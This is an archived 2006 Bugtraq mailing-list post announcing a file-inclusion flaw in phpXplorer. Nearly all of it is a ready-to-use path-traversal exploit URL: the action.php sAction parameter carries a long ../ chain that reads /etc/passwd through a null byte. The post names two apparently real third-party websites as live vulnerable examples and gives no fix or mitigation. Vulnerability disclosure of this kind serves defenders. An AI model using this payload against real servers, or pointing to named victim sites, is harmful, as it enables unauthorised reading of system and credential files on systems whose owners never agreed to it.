[42343] in bugtraq
phpXplorer file inclusion biyosecurity.be
daemon@ATHENA.MIT.EDU (liz0@bsdmail.com)
Fri Jan 20 07:18:12 2006
Date: 18 Jan 2006 00:22:49 -0000
Message-ID: <20060118002249.1342.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: liz0@bsdmail.com
To: bugtraq@securityfocus.com
site:www.phpxplorer.org
------------------------------------------------
http://victim/folder/system/action.php?sShare=guest&sAction=../../../../../../../../../../../../etc/passwd%00
-------------------------------------------------
example:
http://fta.lv/phpXplorer/system/action.php?sShare=guest&sAction=../../../../../../../../../../../../etc/passwd%00
http://lasersprint.com/phpXplorer/system/action.php?sShare=guest&sAction=../../../../../../../../../../../../etc/passwd%00
------------------------------------------------
Credit:Liz0ziM&Cyberlord biyosecurity.be
-------------------------------------------------
source:
http://www.blogcu.com/Liz0ziM/200529/